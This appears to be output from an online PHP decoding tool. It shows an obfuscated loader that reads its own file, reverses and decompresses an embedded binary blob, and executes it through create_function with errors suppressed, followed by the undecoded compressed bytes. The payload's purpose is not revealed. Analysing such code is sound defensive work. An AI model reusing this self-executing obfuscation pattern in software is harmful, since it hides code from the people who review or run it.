Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_c..

Decoded Output download

<?  error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));                ?> 
72352f0aed15ca409886b3919893fa6c^Q<82>@^E^O<82>-#xrJ&trE&^W^Nr<96>4w<8c>^?^X<8d>^_$R<92>C`<80>.^W^?<9b><8c>^\k^Cf<8a><9d>^O"k 
R]<89>rB<82><9a>HsLsS<90>b=^Ts^T_pP<96>]`I<91>^E<8e><9a>^W<99>^X^]b ^Qg;^?^QQ^Q<8b>k ^EZ8<83>!^\<95>^H<9d>V %<97>[^]^X+Bu^P#RW<8c><89>f<93>!q<90><91>><93>zcx<97><9d>v7RN|[4zBP<89>w^?w?<92>s<97>^U[<89>4$B^[}^E^C~ 
I*<93>me^F^^?^P0K_PU<9c>x

Did this file decode correctly?

Original Code

error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));__halt_compiler();
72352f0aed15ca409886b3919893fa6c^Q<82>@^E^O<82>-#xrJ&trE&^W^Nr<96>4w<8c>^?^X<8d>^_$R<92>C`<80>.^W^?<9b><8c>^\k^Cf<8a><9d>^O"k
R]<89>rB<82><9a>HsLsS<90>b=^Ts^T_pP<96>]`I<91>^E<8e><9a>^W<99>^X^]b ^Qg;^?^QQ^Q<8b>k ^EZ8<83>!^\<95>^H<9d>V %<97>[^]^X+Bu^P#RW<8c><89>f<93>!q<90><91>><93>zcx<97><9d>v7RN|[4zBP<89>w^?w?<92>s<97>^U[<89>4$B^[}^E^C~
I*<93>me^F^^?^P0K_PU<9c>x

Function Calls

fopen 1
fseek 1
error_reporting 1

Variables

$handle True

Stats

MD5 49c918cf5038c8997159ddfa98bfc0f0
Eval Count 0
Decode Time 51 ms